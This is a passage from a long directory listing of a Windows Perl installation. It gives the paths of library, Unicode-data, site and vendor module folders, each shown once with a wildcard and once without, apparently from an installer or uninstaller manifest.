c:\Perl\perl\lib\auto\Test\*<br />
c:\Perl\perl\lib\auto\Test<br />
c:\Perl\perl\lib\auto\Test\Harness\*<br />
c:\Perl\perl\lib\auto\Test\Harness<br />
c:\Perl\perl\lib\auto\Test\Simple\*<br />
c:\Perl\perl\lib\auto\Test\Simple<br />
c:\Perl\perl\lib\auto\Text\*<br />
c:\Perl\perl\lib\auto\Text<br />
c:\Perl\perl\lib\auto\Text\Soundex\*<br />
c:\Perl\perl\lib\auto\Text\Soundex<br />
c:\Perl\perl\lib\auto\Thread\*<br />
c:\Perl\perl\lib\auto\Thread<br />
c:\Perl\perl\lib\auto\Thread\Queue\*<br />
c:\Perl\perl\lib\auto\Thread\Queue<br />
c:\Perl\perl\lib\auto\Thread\Semaphore\*<br />
c:\Perl\perl\lib\auto\Thread\Semaphore<br />
c:\Perl\perl\lib\auto\threads\*<br />
c:\Perl\perl\lib\auto\threads<br />
c:\Perl\perl\lib\auto\threads\shared\*<br />
c:\Perl\perl\lib\auto\threads\shared<br />
c:\Perl\perl\lib\auto\Tie\*<br />
c:\Perl\perl\lib\auto\Tie<br />
c:\Perl\perl\lib\auto\Tie\RefHash\*<br />
c:\Perl\perl\lib\auto\Tie\RefHash<br />
c:\Perl\perl\lib\auto\Time\*<br />
c:\Perl\perl\lib\auto\Time<br />
c:\Perl\perl\lib\auto\Time\HiRes\*<br />
c:\Perl\perl\lib\auto\Time\HiRes<br />
c:\Perl\perl\lib\auto\Time\Local\*<br />
c:\Perl\perl\lib\auto\Time\Local<br />
c:\Perl\perl\lib\auto\Time\Piece\*<br />
c:\Perl\perl\lib\auto\Time\Piece<br />
c:\Perl\perl\lib\auto\Unicode\*<br />
c:\Perl\perl\lib\auto\Unicode<br />
c:\Perl\perl\lib\auto\Unicode\Collate\*<br />
c:\Perl\perl\lib\auto\Unicode\Collate<br />
c:\Perl\perl\lib\auto\Unicode\Normalize\*<br />
c:\Perl\perl\lib\auto\Unicode\Normalize<br />
c:\Perl\perl\lib\auto\version\*<br />
c:\Perl\perl\lib\auto\version<br />
c:\Perl\perl\lib\auto\version\vxs\*<br />
c:\Perl\perl\lib\auto\version\vxs<br />
c:\Perl\perl\lib\auto\Win32\*<br />
c:\Perl\perl\lib\auto\Win32<br />
c:\Perl\perl\lib\auto\Win32API\*<br />
c:\Perl\perl\lib\auto\Win32API<br />
c:\Perl\perl\lib\auto\Win32API\File\*<br />
c:\Perl\perl\lib\auto\Win32API\File<br />
c:\Perl\perl\lib\auto\Win32CORE\*<br />
c:\Perl\perl\lib\auto\Win32CORE<br />
c:\Perl\perl\lib\auto\XSLoader\*<br />
c:\Perl\perl\lib\auto\XSLoader<br />
c:\Perl\perl\lib\autodie\*<br />
c:\Perl\perl\lib\autodie<br />
c:\Perl\perl\lib\autodie\exception\*<br />
c:\Perl\perl\lib\autodie\exception<br />
c:\Perl\perl\lib\B\*<br />
c:\Perl\perl\lib\B<br />
c:\Perl\perl\lib\B\Lint\*<br />
c:\Perl\perl\lib\B\Lint<br />
c:\Perl\perl\lib\Carp\*<br />
c:\Perl\perl\lib\Carp<br />
c:\Perl\perl\lib\CGI\*<br />
c:\Perl\perl\lib\CGI<br />
c:\Perl\perl\lib\Class\*<br />
c:\Perl\perl\lib\Class<br />
c:\Perl\perl\lib\Compress\*<br />
c:\Perl\perl\lib\Compress<br />
c:\Perl\perl\lib\Compress\Raw\*<br />
c:\Perl\perl\lib\Compress\Raw<br />
c:\Perl\perl\lib\Config\*<br />
c:\Perl\perl\lib\Config<br />
c:\Perl\perl\lib\CORE\*<br />
c:\Perl\perl\lib\CORE<br />
c:\Perl\perl\lib\CORE\arpa\*<br />
c:\Perl\perl\lib\CORE\arpa<br />
c:\Perl\perl\lib\CORE\sys\*<br />
c:\Perl\perl\lib\CORE\sys<br />
c:\Perl\perl\lib\CPAN\*<br />
c:\Perl\perl\lib\CPAN<br />
c:\Perl\perl\lib\CPAN\API\*<br />
c:\Perl\perl\lib\CPAN\API<br />
c:\Perl\perl\lib\CPAN\Exception\*<br />
c:\Perl\perl\lib\CPAN\Exception<br />
c:\Perl\perl\lib\CPAN\FTP\*<br />
c:\Perl\perl\lib\CPAN\FTP<br />
c:\Perl\perl\lib\CPAN\HTTP\*<br />
c:\Perl\perl\lib\CPAN\HTTP<br />
c:\Perl\perl\lib\CPAN\Kwalify\*<br />
c:\Perl\perl\lib\CPAN\Kwalify<br />
c:\Perl\perl\lib\CPAN\LWP\*<br />
c:\Perl\perl\lib\CPAN\LWP<br />
c:\Perl\perl\lib\CPANPLUS\*<br />
c:\Perl\perl\lib\CPANPLUS<br />
c:\Perl\perl\lib\CPANPLUS\Backend\*<br />
c:\Perl\perl\lib\CPANPLUS\Backend<br />
c:\Perl\perl\lib\CPANPLUS\Configure\*<br />
c:\Perl\perl\lib\CPANPLUS\Configure<br />
c:\Perl\perl\lib\CPANPLUS\Dist\*<br />
c:\Perl\perl\lib\CPANPLUS\Dist<br />
c:\Perl\perl\lib\CPANPLUS\Dist\Build\*<br />
c:\Perl\perl\lib\CPANPLUS\Dist\Build<br />
c:\Perl\perl\lib\CPANPLUS\Internals\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Constants\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Constants<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Source\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Source<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Source\SQLite\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Source\SQLite<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Utils\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Utils<br />
c:\Perl\perl\lib\CPANPLUS\Module\*<br />
c:\Perl\perl\lib\CPANPLUS\Module<br />
c:\Perl\perl\lib\CPANPLUS\Module\Author\*<br />
c:\Perl\perl\lib\CPANPLUS\Module\Author<br />
c:\Perl\perl\lib\CPANPLUS\Shell\*<br />
c:\Perl\perl\lib\CPANPLUS\Shell<br />
c:\Perl\perl\lib\CPANPLUS\Shell\Default\*<br />
c:\Perl\perl\lib\CPANPLUS\Shell\Default<br />
c:\Perl\perl\lib\CPANPLUS\Shell\Default\Plugins\*<br />
c:\Perl\perl\lib\CPANPLUS\Shell\Default\Plugins<br />
c:\Perl\perl\lib\Data\*<br />
c:\Perl\perl\lib\Data<br />
c:\Perl\perl\lib\DBM_Filter\*<br />
c:\Perl\perl\lib\DBM_Filter<br />
c:\Perl\perl\lib\Devel\*<br />
c:\Perl\perl\lib\Devel<br />
c:\Perl\perl\lib\Devel\DProf\*<br />
c:\Perl\perl\lib\Devel\DProf<br />
c:\Perl\perl\lib\Digest\*<br />
c:\Perl\perl\lib\Digest<br />
c:\Perl\perl\lib\Encode\*<br />
c:\Perl\perl\lib\Encode<br />
c:\Perl\perl\lib\Encode\CN\*<br />
c:\Perl\perl\lib\Encode\CN<br />
c:\Perl\perl\lib\Encode\JP\*<br />
c:\Perl\perl\lib\Encode\JP<br />
c:\Perl\perl\lib\Encode\KR\*<br />
c:\Perl\perl\lib\Encode\KR<br />
c:\Perl\perl\lib\Encode\MIME\*<br />
c:\Perl\perl\lib\Encode\MIME<br />
c:\Perl\perl\lib\Encode\MIME\Header\*<br />
c:\Perl\perl\lib\Encode\MIME\Header<br />
c:\Perl\perl\lib\Encode\Unicode\*<br />
c:\Perl\perl\lib\Encode\Unicode<br />
c:\Perl\perl\lib\encoding\*<br />
c:\Perl\perl\lib\encoding<br />
c:\Perl\perl\lib\Exporter\*<br />
c:\Perl\perl\lib\Exporter<br />
c:\Perl\perl\lib\ExtUtils\*<br />
c:\Perl\perl\lib\ExtUtils<br />
c:\Perl\perl\lib\ExtUtils\CBuilder\*<br />
c:\Perl\perl\lib\ExtUtils\CBuilder<br />
c:\Perl\perl\lib\ExtUtils\CBuilder\Platform\*<br />
c:\Perl\perl\lib\ExtUtils\CBuilder\Platform<br />
c:\Perl\perl\lib\ExtUtils\Command\*<br />
c:\Perl\perl\lib\ExtUtils\Command<br />
c:\Perl\perl\lib\ExtUtils\Constant\*<br />
c:\Perl\perl\lib\ExtUtils\Constant<br />
c:\Perl\perl\lib\ExtUtils\Liblist\*<br />
c:\Perl\perl\lib\ExtUtils\Liblist<br />
c:\Perl\perl\lib\ExtUtils\MakeMaker\*<br />
c:\Perl\perl\lib\ExtUtils\MakeMaker<br />
c:\Perl\perl\lib\File\*<br />
c:\Perl\perl\lib\File<br />
c:\Perl\perl\lib\File\Spec\*<br />
c:\Perl\perl\lib\File\Spec<br />
c:\Perl\perl\lib\Filter\*<br />
c:\Perl\perl\lib\Filter<br />
c:\Perl\perl\lib\Filter\Util\*<br />
c:\Perl\perl\lib\Filter\Util<br />
c:\Perl\perl\lib\Getopt\*<br />
c:\Perl\perl\lib\Getopt<br />
c:\Perl\perl\lib\Hash\*<br />
c:\Perl\perl\lib\Hash<br />
c:\Perl\perl\lib\Hash\Util\*<br />
c:\Perl\perl\lib\Hash\Util<br />
c:\Perl\perl\lib\I18N\*<br />
c:\Perl\perl\lib\I18N<br />
c:\Perl\perl\lib\I18N\LangTags\*<br />
c:\Perl\perl\lib\I18N\LangTags<br />
c:\Perl\perl\lib\inc\*<br />
c:\Perl\perl\lib\inc<br />
c:\Perl\perl\lib\inc\latest\*<br />
c:\Perl\perl\lib\inc\latest<br />
c:\Perl\perl\lib\IO\*<br />
c:\Perl\perl\lib\IO<br />
c:\Perl\perl\lib\IO\Compress\*<br />
c:\Perl\perl\lib\IO\Compress<br />
c:\Perl\perl\lib\IO\Compress\Adapter\*<br />
c:\Perl\perl\lib\IO\Compress\Adapter<br />
c:\Perl\perl\lib\IO\Compress\Base\*<br />
c:\Perl\perl\lib\IO\Compress\Base<br />
c:\Perl\perl\lib\IO\Compress\Gzip\*<br />
c:\Perl\perl\lib\IO\Compress\Gzip<br />
c:\Perl\perl\lib\IO\Compress\Zip\*<br />
c:\Perl\perl\lib\IO\Compress\Zip<br />
c:\Perl\perl\lib\IO\Compress\Zlib\*<br />
c:\Perl\perl\lib\IO\Compress\Zlib<br />
c:\Perl\perl\lib\IO\Socket\*<br />
c:\Perl\perl\lib\IO\Socket<br />
c:\Perl\perl\lib\IO\Uncompress\*<br />
c:\Perl\perl\lib\IO\Uncompress<br />
c:\Perl\perl\lib\IO\Uncompress\Adapter\*<br />
c:\Perl\perl\lib\IO\Uncompress\Adapter<br />
c:\Perl\perl\lib\IPC\*<br />
c:\Perl\perl\lib\IPC<br />
c:\Perl\perl\lib\List\*<br />
c:\Perl\perl\lib\List<br />
c:\Perl\perl\lib\List\Util\*<br />
c:\Perl\perl\lib\List\Util<br />
c:\Perl\perl\lib\Locale\*<br />
c:\Perl\perl\lib\Locale<br />
c:\Perl\perl\lib\Locale\Codes\*<br />
c:\Perl\perl\lib\Locale\Codes<br />
c:\Perl\perl\lib\Locale\Maketext\*<br />
c:\Perl\perl\lib\Locale\Maketext<br />
c:\Perl\perl\lib\Log\*<br />
c:\Perl\perl\lib\Log<br />
c:\Perl\perl\lib\Log\Message\*<br />
c:\Perl\perl\lib\Log\Message<br />
c:\Perl\perl\lib\Math\*<br />
c:\Perl\perl\lib\Math<br />
c:\Perl\perl\lib\Math\BigFloat\*<br />
c:\Perl\perl\lib\Math\BigFloat<br />
c:\Perl\perl\lib\Math\BigInt\*<br />
c:\Perl\perl\lib\Math\BigInt<br />
c:\Perl\perl\lib\Memoize\*<br />
c:\Perl\perl\lib\Memoize<br />
c:\Perl\perl\lib\MIME\*<br />
c:\Perl\perl\lib\MIME<br />
c:\Perl\perl\lib\Module\*<br />
c:\Perl\perl\lib\Module<br />
c:\Perl\perl\lib\Module\Build\*<br />
c:\Perl\perl\lib\Module\Build<br />
c:\Perl\perl\lib\Module\Build\Platform\*<br />
c:\Perl\perl\lib\Module\Build\Platform<br />
c:\Perl\perl\lib\Module\Load\*<br />
c:\Perl\perl\lib\Module\Load<br />
c:\Perl\perl\lib\Module\Pluggable\*<br />
c:\Perl\perl\lib\Module\Pluggable<br />
c:\Perl\perl\lib\Net\*<br />
c:\Perl\perl\lib\Net<br />
c:\Perl\perl\lib\Net\FTP\*<br />
c:\Perl\perl\lib\Net\FTP<br />
c:\Perl\perl\lib\Object\*<br />
c:\Perl\perl\lib\Object<br />
c:\Perl\perl\lib\overload\*<br />
c:\Perl\perl\lib\overload<br />
c:\Perl\perl\lib\Package\*<br />
c:\Perl\perl\lib\Package<br />
c:\Perl\perl\lib\Params\*<br />
c:\Perl\perl\lib\Params<br />
c:\Perl\perl\lib\Parse\*<br />
c:\Perl\perl\lib\Parse<br />
c:\Perl\perl\lib\Parse\CPAN\*<br />
c:\Perl\perl\lib\Parse\CPAN<br />
c:\Perl\perl\lib\PerlIO\*<br />
c:\Perl\perl\lib\PerlIO<br />
c:\Perl\perl\lib\PerlIO\via\*<br />
c:\Perl\perl\lib\PerlIO\via<br />
c:\Perl\perl\lib\Pod\*<br />
c:\Perl\perl\lib\Pod<br />
c:\Perl\perl\lib\Pod\Perldoc\*<br />
c:\Perl\perl\lib\Pod\Perldoc<br />
c:\Perl\perl\lib\Pod\Simple\*<br />
c:\Perl\perl\lib\Pod\Simple<br />
c:\Perl\perl\lib\Pod\Text\*<br />
c:\Perl\perl\lib\Pod\Text<br />
c:\Perl\perl\lib\pods\*<br />
c:\Perl\perl\lib\pods<br />
c:\Perl\perl\lib\Scalar\*<br />
c:\Perl\perl\lib\Scalar<br />
c:\Perl\perl\lib\Scalar\Util\*<br />
c:\Perl\perl\lib\Scalar\Util<br />
c:\Perl\perl\lib\Search\*<br />
c:\Perl\perl\lib\Search<br />
c:\Perl\perl\lib\Sys\*<br />
c:\Perl\perl\lib\Sys<br />
c:\Perl\perl\lib\TAP\*<br />
c:\Perl\perl\lib\TAP<br />
c:\Perl\perl\lib\TAP\Formatter\*<br />
c:\Perl\perl\lib\TAP\Formatter<br />
c:\Perl\perl\lib\TAP\Formatter\Console\*<br />
c:\Perl\perl\lib\TAP\Formatter\Console<br />
c:\Perl\perl\lib\TAP\Formatter\File\*<br />
c:\Perl\perl\lib\TAP\Formatter\File<br />
c:\Perl\perl\lib\TAP\Harness\*<br />
c:\Perl\perl\lib\TAP\Harness<br />
c:\Perl\perl\lib\TAP\Parser\*<br />
c:\Perl\perl\lib\TAP\Parser<br />
c:\Perl\perl\lib\TAP\Parser\Iterator\*<br />
c:\Perl\perl\lib\TAP\Parser\Iterator<br />
c:\Perl\perl\lib\TAP\Parser\Result\*<br />
c:\Perl\perl\lib\TAP\Parser\Result<br />
c:\Perl\perl\lib\TAP\Parser\Scheduler\*<br />
c:\Perl\perl\lib\TAP\Parser\Scheduler<br />
c:\Perl\perl\lib\TAP\Parser\Source\*<br />
c:\Perl\perl\lib\TAP\Parser\Source<br />
c:\Perl\perl\lib\TAP\Parser\SourceHandler\*<br />
c:\Perl\perl\lib\TAP\Parser\SourceHandler<br />
c:\Perl\perl\lib\TAP\Parser\YAMLish\*<br />
c:\Perl\perl\lib\TAP\Parser\YAMLish<br />
c:\Perl\perl\lib\Term\*<br />
c:\Perl\perl\lib\Term<br />
c:\Perl\perl\lib\Term\ReadLine\*<br />
c:\Perl\perl\lib\Term\ReadLine<br />
c:\Perl\perl\lib\Term\UI\*<br />
c:\Perl\perl\lib\Term\UI<br />
c:\Perl\perl\lib\Test\*<br />
c:\Perl\perl\lib\Test<br />
c:\Perl\perl\lib\Test\Builder\*<br />
c:\Perl\perl\lib\Test\Builder<br />
c:\Perl\perl\lib\Test\Builder\IO\*<br />
c:\Perl\perl\lib\Test\Builder\IO<br />
c:\Perl\perl\lib\Test\Builder\Tester\*<br />
c:\Perl\perl\lib\Test\Builder\Tester<br />
c:\Perl\perl\lib\Text\*<br />
c:\Perl\perl\lib\Text<br />
c:\Perl\perl\lib\Thread\*<br />
c:\Perl\perl\lib\Thread<br />
c:\Perl\perl\lib\threads\*<br />
c:\Perl\perl\lib\threads<br />
c:\Perl\perl\lib\Tie\*<br />
c:\Perl\perl\lib\Tie<br />
c:\Perl\perl\lib\Tie\Hash\*<br />
c:\Perl\perl\lib\Tie\Hash<br />
c:\Perl\perl\lib\Time\*<br />
c:\Perl\perl\lib\Time<br />
c:\Perl\perl\lib\Unicode\*<br />
c:\Perl\perl\lib\Unicode<br />
c:\Perl\perl\lib\Unicode\Collate\*<br />
c:\Perl\perl\lib\Unicode\Collate<br />
c:\Perl\perl\lib\Unicode\Collate\CJK\*<br />
c:\Perl\perl\lib\Unicode\Collate\CJK<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\*<br />
c:\Perl\perl\lib\Unicode\Collate\Locale<br />
c:\Perl\perl\lib\unicore\*<br />
c:\Perl\perl\lib\unicore<br />
c:\Perl\perl\lib\unicore\auxiliary\*<br />
c:\Perl\perl\lib\unicore\auxiliary<br />
c:\Perl\perl\lib\unicore\extracted\*<br />
c:\Perl\perl\lib\unicore\extracted<br />
c:\Perl\perl\lib\unicore\lib\*<br />
c:\Perl\perl\lib\unicore\lib<br />
c:\Perl\perl\lib\unicore\lib\Age\*<br />
c:\Perl\perl\lib\unicore\lib\Age<br />
c:\Perl\perl\lib\unicore\lib\AHex\*<br />
c:\Perl\perl\lib\unicore\lib\AHex<br />
c:\Perl\perl\lib\unicore\lib\Alpha\*<br />
c:\Perl\perl\lib\unicore\lib\Alpha<br />
c:\Perl\perl\lib\unicore\lib\Bc\*<br />
c:\Perl\perl\lib\unicore\lib\Bc<br />
c:\Perl\perl\lib\unicore\lib\BidiC\*<br />
c:\Perl\perl\lib\unicore\lib\BidiC<br />
c:\Perl\perl\lib\unicore\lib\BidiM\*<br />
c:\Perl\perl\lib\unicore\lib\BidiM<br />
c:\Perl\perl\lib\unicore\lib\Blk\*<br />
c:\Perl\perl\lib\unicore\lib\Blk<br />
c:\Perl\perl\lib\unicore\lib\Cased\*<br />
c:\Perl\perl\lib\unicore\lib\Cased<br />
c:\Perl\perl\lib\unicore\lib\Ccc\*<br />
c:\Perl\perl\lib\unicore\lib\Ccc<br />
c:\Perl\perl\lib\unicore\lib\CE\*<br />
c:\Perl\perl\lib\unicore\lib\CE<br />
c:\Perl\perl\lib\unicore\lib\CI\*<br />
c:\Perl\perl\lib\unicore\lib\CI<br />
c:\Perl\perl\lib\unicore\lib\CompEx\*<br />
c:\Perl\perl\lib\unicore\lib\CompEx<br />
c:\Perl\perl\lib\unicore\lib\CWCF\*<br />
c:\Perl\perl\lib\unicore\lib\CWCF<br />
c:\Perl\perl\lib\unicore\lib\CWCM\*<br />
c:\Perl\perl\lib\unicore\lib\CWCM<br />
c:\Perl\perl\lib\unicore\lib\CWKCF\*<br />
c:\Perl\perl\lib\unicore\lib\CWKCF<br />
c:\Perl\perl\lib\unicore\lib\CWL\*<br />
c:\Perl\perl\lib\unicore\lib\CWL<br />
c:\Perl\perl\lib\unicore\lib\CWT\*<br />
c:\Perl\perl\lib\unicore\lib\CWT<br />
c:\Perl\perl\lib\unicore\lib\CWU\*<br />
c:\Perl\perl\lib\unicore\lib\CWU<br />
c:\Perl\perl\lib\unicore\lib\Dash\*<br />
c:\Perl\perl\lib\unicore\lib\Dash<br />
c:\Perl\perl\lib\unicore\lib\Dep\*<br />
c:\Perl\perl\lib\unicore\lib\Dep<br />
c:\Perl\perl\lib\unicore\lib\DI\*<br />
c:\Perl\perl\lib\unicore\lib\DI<br />
c:\Perl\perl\lib\unicore\lib\Dia\*<br />
c:\Perl\perl\lib\unicore\lib\Dia<br />
c:\Perl\perl\lib\unicore\lib\Dt\*<br />
c:\Perl\perl\lib\unicore\lib\Dt<br />
c:\Perl\perl\lib\unicore\lib\Ea\*<br />
c:\Perl\perl\lib\unicore\lib\Ea<br />
c:\Perl\perl\lib\unicore\lib\Ext\*<br />
c:\Perl\perl\lib\unicore\lib\Ext<br />
c:\Perl\perl\lib\unicore\lib\Gc\*<br />
c:\Perl\perl\lib\unicore\lib\Gc<br />
c:\Perl\perl\lib\unicore\lib\GCB\*<br />
c:\Perl\perl\lib\unicore\lib\GCB<br />
c:\Perl\perl\lib\unicore\lib\GrBase\*<br />
c:\Perl\perl\lib\unicore\lib\GrBase<br />
c:\Perl\perl\lib\unicore\lib\GrExt\*<br />
c:\Perl\perl\lib\unicore\lib\GrExt<br />
c:\Perl\perl\lib\unicore\lib\Hex\*<br />
c:\Perl\perl\lib\unicore\lib\Hex<br />
c:\Perl\perl\lib\unicore\lib\Hst\*<br />
c:\Perl\perl\lib\unicore\lib\Hst<br />
c:\Perl\perl\lib\unicore\lib\Hyphen\*<br />
c:\Perl\perl\lib\unicore\lib\Hyphen<br />
c:\Perl\perl\lib\unicore\lib\IDC\*<br />
c:\Perl\perl\lib\unicore\lib\IDC<br />
c:\Perl\perl\lib\unicore\lib\Ideo\*<br />
c:\Perl\perl\lib\unicore\lib\Ideo<br />
c:\Perl\perl\lib\unicore\lib\IDS\*<br />
c:\Perl\perl\lib\unicore\lib\IDS<br />
c:\Perl\perl\lib\unicore\lib\IDSB\*<br />
c:\Perl\perl\lib\unicore\lib\IDSB<br />
c:\Perl\perl\lib\unicore\lib\IDST\*<br />
c:\Perl\perl\lib\unicore\lib\IDST<br />
c:\Perl\perl\lib\unicore\lib\In\*<br />
c:\Perl\perl\lib\unicore\lib\In<br />
c:\Perl\perl\lib\unicore\lib\Jg\*<br />
c:\Perl\perl\lib\unicore\lib\Jg<br />
c:\Perl\perl\lib\unicore\lib\JoinC\*<br />
c:\Perl\perl\lib\unicore\lib\JoinC<br />
c:\Perl\perl\lib\unicore\lib\Jt\*<br />
c:\Perl\perl\lib\unicore\lib\Jt<br />
c:\Perl\perl\lib\unicore\lib\Lb\*<br />
c:\Perl\perl\lib\unicore\lib\Lb<br />
c:\Perl\perl\lib\unicore\lib\LOE\*<br />
c:\Perl\perl\lib\unicore\lib\LOE<br />
c:\Perl\perl\lib\unicore\lib\Lower\*<br />
c:\Perl\perl\lib\unicore\lib\Lower<br />
c:\Perl\perl\lib\unicore\lib\Math\*<br />
c:\Perl\perl\lib\unicore\lib\Math<br />
c:\Perl\perl\lib\unicore\lib\NChar\*<br />
c:\Perl\perl\lib\unicore\lib\NChar<br />
c:\Perl\perl\lib\unicore\lib\NFCQC\*<br />
c:\Perl\perl\lib\unicore\lib\NFCQC<br />
c:\Perl\perl\lib\unicore\lib\NFDQC\*<br />
c:\Perl\perl\lib\unicore\lib\NFDQC<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\*<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC<br />
c:\Perl\perl\lib\unicore\lib\NFKDQC\*<br />
c:\Perl\perl\lib\unicore\lib\NFKDQC<br />
c:\Perl\perl\lib\unicore\lib\Nt\*<br />
c:\Perl\perl\lib\unicore\lib\Nt<br />
c:\Perl\perl\lib\unicore\lib\Nv\*<br />
c:\Perl\perl\lib\unicore\lib\Nv<br />
c:\Perl\perl\lib\unicore\lib\OAlpha\*<br />
c:\Perl\perl\lib\unicore\lib\OAlpha<br />
c:\Perl\perl\lib\unicore\lib\ODI\*<br />
c:\Perl\perl\lib\unicore\lib\ODI<br />
c:\Perl\perl\lib\unicore\lib\OGrExt\*<br />
c:\Perl\perl\lib\unicore\lib\OGrExt<br />
c:\Perl\perl\lib\unicore\lib\OIDC\*<br />
c:\Perl\perl\lib\unicore\lib\OIDC<br />
c:\Perl\perl\lib\unicore\lib\OIDS\*<br />
c:\Perl\perl\lib\unicore\lib\OIDS<br />
c:\Perl\perl\lib\unicore\lib\OLower\*<br />
c:\Perl\perl\lib\unicore\lib\OLower<br />
c:\Perl\perl\lib\unicore\lib\OMath\*<br />
c:\Perl\perl\lib\unicore\lib\OMath<br />
c:\Perl\perl\lib\unicore\lib\OUpper\*<br />
c:\Perl\perl\lib\unicore\lib\OUpper<br />
c:\Perl\perl\lib\unicore\lib\PatSyn\*<br />
c:\Perl\perl\lib\unicore\lib\PatSyn<br />
c:\Perl\perl\lib\unicore\lib\PatWS\*<br />
c:\Perl\perl\lib\unicore\lib\PatWS<br />
c:\Perl\perl\lib\unicore\lib\Perl\*<br />
c:\Perl\perl\lib\unicore\lib\Perl<br />
c:\Perl\perl\lib\unicore\lib\QMark\*<br />
c:\Perl\perl\lib\unicore\lib\QMark<br />
c:\Perl\perl\lib\unicore\lib\Radical\*<br />
c:\Perl\perl\lib\unicore\lib\Radical<br />
c:\Perl\perl\lib\unicore\lib\SB\*<br />
c:\Perl\perl\lib\unicore\lib\SB<br />
c:\Perl\perl\lib\unicore\lib\Sc\*<br />
c:\Perl\perl\lib\unicore\lib\Sc<br />
c:\Perl\perl\lib\unicore\lib\SD\*<br />
c:\Perl\perl\lib\unicore\lib\SD<br />
c:\Perl\perl\lib\unicore\lib\Space\*<br />
c:\Perl\perl\lib\unicore\lib\Space<br />
c:\Perl\perl\lib\unicore\lib\STerm\*<br />
c:\Perl\perl\lib\unicore\lib\STerm<br />
c:\Perl\perl\lib\unicore\lib\Term\*<br />
c:\Perl\perl\lib\unicore\lib\Term<br />
c:\Perl\perl\lib\unicore\lib\UIdeo\*<br />
c:\Perl\perl\lib\unicore\lib\UIdeo<br />
c:\Perl\perl\lib\unicore\lib\Upper\*<br />
c:\Perl\perl\lib\unicore\lib\Upper<br />
c:\Perl\perl\lib\unicore\lib\VS\*<br />
c:\Perl\perl\lib\unicore\lib\VS<br />
c:\Perl\perl\lib\unicore\lib\WB\*<br />
c:\Perl\perl\lib\unicore\lib\WB<br />
c:\Perl\perl\lib\unicore\lib\XIDC\*<br />
c:\Perl\perl\lib\unicore\lib\XIDC<br />
c:\Perl\perl\lib\unicore\lib\XIDS\*<br />
c:\Perl\perl\lib\unicore\lib\XIDS<br />
c:\Perl\perl\lib\unicore\To\*<br />
c:\Perl\perl\lib\unicore\To<br />
c:\Perl\perl\lib\User\*<br />
c:\Perl\perl\lib\User<br />
c:\Perl\perl\lib\version\*<br />
c:\Perl\perl\lib\version<br />
c:\Perl\perl\lib\warnings\*<br />
c:\Perl\perl\lib\warnings<br />
c:\Perl\perl\lib\Win32API\*<br />
c:\Perl\perl\lib\Win32API<br />
c:\Perl\perl\lib\Win32API\File\*<br />
c:\Perl\perl\lib\Win32API\File<br />
c:\Perl\perl\site\*<br />
c:\Perl\perl\site<br />
c:\Perl\perl\site\bin\*<br />
c:\Perl\perl\site\bin<br />
c:\Perl\perl\site\lib\*<br />
c:\Perl\perl\site\lib<br />
c:\Perl\perl\vendor\*<br />
c:\Perl\perl\vendor<br />
c:\Perl\perl\vendor\lib\*<br />
c:\Perl\perl\vendor\lib<br />
c:\Perl\perl\vendor\lib\Algorithm\*<br />
c:\Perl\perl\vendor\lib\Algorithm<br />
c:\Perl\perl\vendor\lib\Alien\*<br />
c:\Perl\perl\vendor\lib\Alien<br />
c:\Perl\perl\vendor\lib\Alien\Tidyp\*<br />
c:\Perl\perl\vendor\lib\Alien\Tidyp<br />
c:\Perl\perl\vendor\lib\Apache\*<br />
c:\Perl\perl\vendor\lib\Apache<br />
c:\Perl\perl\vendor\lib\Apache\XMLRPC\*<br />
c:\Perl\perl\vendor\lib\Apache\XMLRPC<br />
c:\Perl\perl\vendor\lib\App\*<br />
c:\Perl\perl\vendor\lib\App<br />
c:\Perl\perl\vendor\lib\App\local\*<br />
c:\Perl\perl\vendor\lib\App\local<br />
c:\Perl\perl\vendor\lib\App\local\lib\*<br />
c:\Perl\perl\vendor\lib\App\local\lib<br />
c:\Perl\perl\vendor\lib\Archive\*<br />
c:\Perl\perl\vendor\lib\Archive<br />
c:\Perl\perl\vendor\lib\Archive\Zip\*<br />
c:\Perl\perl\vendor\lib\Archive\Zip<br />
c:\Perl\perl\vendor\lib\auto\*<br />
c:\Perl\perl\vendor\lib\auto<br />
c:\Perl\perl\vendor\lib\auto\Algorithm\*<br />
c:\Perl\perl\vendor\lib\auto\Algorithm<br />
c:\Perl\perl\vendor\lib\auto\Algorithm\Diff\*<br />
c:\Perl\perl\vendor\lib\auto\Algorithm\Diff<br />
c:\Perl\perl\vendor\lib\auto\Alien\*<br />
c:\Perl\perl\vendor\lib\auto\Alien<br />
c:\Perl\perl\vendor\lib\auto\Alien\Tidyp\*<br />
c:\Perl\perl\vendor\lib\auto\Alien\Tidyp<br />
c:\Perl\perl\vendor\lib\auto\App\*<br />
c:\Perl\perl\vendor\lib\auto\App<br />
c:\Perl\perl\vendor\lib\auto\App\local\*<br />
c:\Perl\perl\vendor\lib\auto\App\local<br />
c:\Perl\perl\vendor\lib\auto\App\local\lib\*<br />
c:\Perl\perl\vendor\lib\auto\App\local\lib<br />
c:\Perl\perl\vendor\lib\auto\App\local\lib\Win32Helper\*<br />
c:\Perl\perl\vendor\lib\auto\App\local\lib\Win32Helper<br />
c:\Perl\perl\vendor\lib\auto\Archive\*<br />
c:\Perl\perl\vendor\lib\auto\Archive<br />
c:\Perl\perl\vendor\lib\auto\Archive\Zip\*<br />
c:\Perl\perl\vendor\lib\auto\Archive\Zip<br />
c:\Perl\perl\vendor\lib\auto\BerkeleyDB\*<br />
c:\Perl\perl\vendor\lib\auto\BerkeleyDB<br />
c:\Perl\perl\vendor\lib\auto\Class\*<br />
c:\Perl\perl\vendor\lib\auto\Class<br />
c:\Perl\perl\vendor\lib\auto\Class\ErrorHandler\*<br />
c:\Perl\perl\vendor\lib\auto\Class\ErrorHandler<br />
c:\Perl\perl\vendor\lib\auto\Class\Inspector\*<br />
c:\Perl\perl\vendor\lib\auto\Class\Inspector<br />
c:\Perl\perl\vendor\lib\auto\Class\Loader\*<br />
c:\Perl\perl\vendor\lib\auto\Class\Loader<br />
c:\Perl\perl\vendor\lib\auto\common\*<br />
